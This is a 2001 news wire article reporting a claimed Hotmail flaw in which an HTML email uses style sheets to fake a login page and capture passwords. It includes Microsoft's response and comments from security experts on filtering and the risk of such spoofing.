NewsMax.com Wires
Sunday, Feb. 18, 2001

In a statement on Friday, Microsoft (stock: MSFT) said it intended to look into the possibility of security cracks that the consulting firm, Neurocom, said it detected earlier in the week in the Hotmail program.

"Microsoft is moving forward on the investigation with all due speed and, when it is completed, we will take the appropriate action," the company said.

Exactly what that remedy might be, the software titan said, is still unclear. Microsoft said it first learned of the new claims of security lapses in the e-mail program through "news channels," and contacted Neurocom to "learn more about this alleged vulnerability."

"They have not yet responded to our repeated requests for technical details," the Microsoft statement said. "Without additional information, we cannot say whether there is or isn't a vulnerability here."

Grégory Duchemin, an ethical hacker with Neurocom, apparently found the security hole earlier this week.

"We had not contacted Microsoft, but they got in touch with us," said Rosy Zaour, a Neurocom spokeswoman. "However, they haven't followed up on confirming the information yet."

Neurocom said that, by using cascading style sheets (CSS), hackers could easily replicate the look and feel of Web-based mail packages, leaving the user unaware of the fact that they have a problem.

CSS is a standardized tool used by most website designers to simplify the means by which browsers lay out and display complex Web pages.

By exploiting features of CSS, the offending e-mail message can manufacture a login screen that appears identical to the real Hotmail login, but which sends the login information—including password—to the hacker's server.

According to a statement from Neurocom, "a hacker will use a Trojan horse written in HTML language and having for result [sic], when opening the mail, to recover the totality of the [browser] screen and to display the perfect replica of Hotmail's re-login page.

"The users' passwords for these kinds of services are all susceptible to being discovered thanks to this technique," Neurocom said.

Security engineer Mark Kadrich, the former principal consultant for INS Security, said the trick "is a directed attack, in that the exploit is buried as an attachment within an e-mail message."

Microsoft fixed what it called "similar sounding" problems with Hotmail in December. Yet the company is concerned that Neurocom went ahead and publicized the weakness even after the fix was made.

So, how can users employ filtering mechanisms to prevent such incursions?

"The right way to implement a filtering system is to have a list of good HTML syntax, and only allow those tags in instead of trying to filter out known bad things," said Elias Levy, CTO of securityfocus.com, a security consulting firm.

"It's a good trick," said Rick Steinberger, technical director of SecurityPortal.com, a security website. "There's nothing that says how widespread this is, but my guess would be that this has some potentials to take off. It's violating the privacy of those people, and you could imitate them or delete their e-mail."

Steinberger said users need to be smart about potential attacks.

"This is not that different from the Anna Kournikova virus," he said, "in that it gets people to do something unwise. A lot of people are not terribly sophisticated about their interaction on the Internet."

Rafael Feitelberg, CEO of security solutions provider Gilian Technologies, Redwood Shores, Calif., believes the type of exploit that plagues Hotmail theoretically could affect any website that utilizes a login page or a data input form.

But ordinary security software, Feitelberg stated, wouldn't be able to detect such a spoof as it was happening, because the site being spoofed is not the one sending out the false login page.

Copyright (C) 2001 CMP Media Inc.